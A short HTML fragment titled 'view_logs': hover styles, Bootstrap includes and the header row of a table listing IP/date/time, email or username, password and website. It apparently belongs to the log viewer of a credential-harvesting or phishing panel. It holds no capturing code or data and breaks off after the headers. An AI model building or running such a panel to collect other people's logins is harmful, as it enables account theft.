<!DOCTYPE html>
<html>
<head>
	<style>
	   
		.box1D {
		    border-radius:5px 5px 5px 5px;
		    transition: box-shadow 0.2s;
		}
	    .box1D:hover {
		    box-shadow: 3px 3px 3px 3px #000;
		    border:solid 0.5px #fff;
		    border-radius: 10px;
		}

		.box2D {
		    border-radius:5px 5px 5px 5px;
		    transition: box-shadow 0.2s;
		}
	    .box2D:hover {
		    box-shadow: 3px 3px 3px 3px #000;
		    border:solid 0.5px #fff;
		    border-radius: 10px;
		}

		 .box3D {
		    border-radius:5px 5px 5px 5px;
		    transition: box-shadow 0.2s;
		}
	    .box3D:hover {
		    box-shadow: 3px 3px 3px 3px #000;
		    border:solid 0.5px #fff;
		    border-radius: 10px;
		}

	</style>
	
    <title>view_logs</title>
    <link rel="stylesheet" href="../bootstrap/css/bootstrap.min.css">
</head>
<body width="500">
    <script src="../bootstrap/js/jquery-3.2.1.slim.min.js"></script>
    <script src="../bootstrap/js/popper.min.js"></script>
    <script src="../bootstrap/js/bootstrap.min.js"></script>
<table class="table table-striped" border="1">
  <thead class="thead-dark">

    <tr>
      <th>IP_DATE_HEURE</th>
      <th>Email /Username </th>
      <th>Password</th>
      <th>Web Site</th>
      
   